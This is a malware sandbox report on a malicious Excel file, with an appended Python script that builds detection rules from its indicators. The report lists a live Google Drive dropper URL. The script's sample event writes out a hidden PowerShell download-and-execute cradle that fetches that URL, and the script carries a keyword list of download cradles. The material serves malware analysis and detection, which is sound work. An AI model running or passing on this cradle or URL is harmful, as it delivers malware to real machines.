General

  • Target

    fca38bbe2ae4512d5245a3d53392185bd425e7045c6fdd72a2928c1e5ec8e036.xls

  • Size

    869KB

  • Sample

    241023-cfsd6awcrb

  • MD5

    22100d6799cce6677b27c5adedc37555

  • SHA1

    ab6e115fb8de52dce34a26b384780c730bb1c0bf

  • SHA256

    fca38bbe2ae4512d5245a3d53392185bd425e7045c6fdd72a2928c1e5ec8e036

  • SHA512

    a78943a97ca87c20a0da4380da617ca3248399fc9b00a101886f08972696606309fa8962cc3b66ff7dd8daefb2ba20572fa5401b7764e4ee7fc25d87d7bffdcb

  • SSDEEP

    12288:1lBjmzHJE+CzldDD3DERnLRmF8DaJhuBU3LLQDC7SGooNnlix9I:TByczlVbARM8uoU3nQ4xiH

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs

    ps1.dropper

      https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

    exe.dropper

      https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Targets

    • Target

      fca38bbe2ae4512d5245a3d53392185bd425e7045c6fdd72a2928c1e5ec8e036.xls

    • Size

      869KB

    • MD5

      22100d6799cce6677b27c5adedc37555

    • SHA1

      ab6e115fb8de52dce34a26b384780c730bb1c0bf

    • SHA256

      fca38bbe2ae4512d5245a3d53392185bd425e7045c6fdd72a2928c1e5ec8e036

    • SHA512

      a78943a97ca87c20a0da4380da617ca3248399fc9b00a101886f08972696606309fa8962cc3b66ff7dd8daefb2ba20572fa5401b7764e4ee7fc25d87d7bffdcb

    • SSDEEP

      12288:1lBjmzHJE+CzldDD3DERnLRmF8DaJhuBU3LLQDC7SGooNnlix9I:TByczlVbARM8uoU3nQ4xiH

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with its display window hidden.

    • Evasion via Device Credential Deployment

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory
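As an added example, not part of this sandbox report, the Python below turns the extracted dropper URL (Malware Config) and the behavioural signatures listed above (an Office parent spawning an interpreter, PowerShell started with a hidden window, a network request to an abused legitimate hosting service) into checks over Sysmon-style process-creation events. Only the Google Drive URL and its file id come from the report; the sample events, the Office/interpreter process lists and the download-cradle keyword list are assumptions constructed for the example.

```python
"""Added example (not part of the sandbox report): process-creation triage rules
built from the report's extracted dropper URL and behavioural signatures.
All events below are constructed Sysmon-style records, not data from the report."""
import re
from dataclasses import dataclass

# Indicator taken from the report's "Malware Config" (ps1.dropper / exe.dropper).
DROPPER_URL = "https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur"
DROPPER_ID = "1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur"

# Assumed lists: Office parents that should rarely launch a script interpreter.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Google Drive direct-download links and the file id inside them.
GDRIVE_RE = re.compile(r"""https?://drive\.google\.com/uc\?[^\s"'()]+""", re.I)
ID_RE = re.compile(r"[?&]id=([\w-]+)")
# Assumed keyword list of common PowerShell download cradles.
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|"
                       r"Invoke-RestMethod|\birm\b|Start-BitsTransfer|\bcurl\b", re.I)


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def hidden_window(argv) -> bool:
    """True for '-WindowStyle Hidden', including the abbreviated '-W Hidden' and
    '-w 1' forms: powershell.exe accepts any unambiguous prefix of a parameter name."""
    for flag, value in zip(argv, argv[1:]):
        flag = flag.lower()
        if len(flag) >= 2 and "-windowstyle".startswith(flag) \
                and value.lower() in ("hidden", "1"):
            return True
    return False


def analyze(ev: ProcEvent):
    """Return the findings for one process-creation event."""
    findings = []
    parent, child = basename(ev.parent_image), basename(ev.image)
    argv = ev.command_line.split()
    if parent in OFFICE_PARENTS and child in INTERPRETERS:
        findings.append(Finding("office_spawns_interpreter", f"{parent} -> {child}"))
    if child in ("powershell.exe", "pwsh.exe") and hidden_window(argv):
        findings.append(Finding("powershell_hidden_window", " ".join(argv[1:])))
    cradle = CRADLE_RE.search(ev.command_line)
    if cradle:
        findings.append(Finding("download_cradle", cradle.group(0)))
    for url in GDRIVE_RE.findall(ev.command_line):
        m = ID_RE.search(url)
        fid = m.group(1) if m else ""
        rule = "known_dropper_url" if fid == DROPPER_ID else "gdrive_direct_download"
        findings.append(Finding(rule, url))
    return findings


def rules_hit(ev: ProcEvent):
    return {f.rule for f in analyze(ev)}


SAMPLE_EVENTS = [
    # Constructed: the chain the report's signatures describe.
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoP -NonI -W Hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('" + DROPPER_URL + "')\""),
    # Constructed: benign scheduled script, no hidden window, no download cradle.
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    # Constructed: Excel printing spawns the spooler helper, not an interpreter.
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\splwow64.exe", "splwow64.exe 12288"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(basename(ev.parent_image), "->", basename(ev.image))
        for f in analyze(ev):
            print("   ", f.rule, ":", f.detail)
```

Matching on the Drive file id rather than the whole URL string catches the same dropper when the parameter order or scheme differs; any other `drive.google.com/uc?` download from an Office-spawned interpreter still surfaces as `gdrive_direct_download`, which is the "legitimate hosting service abused" signature without the specific indicator.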

MITRE ATT&CK Enterprise v15

Tasks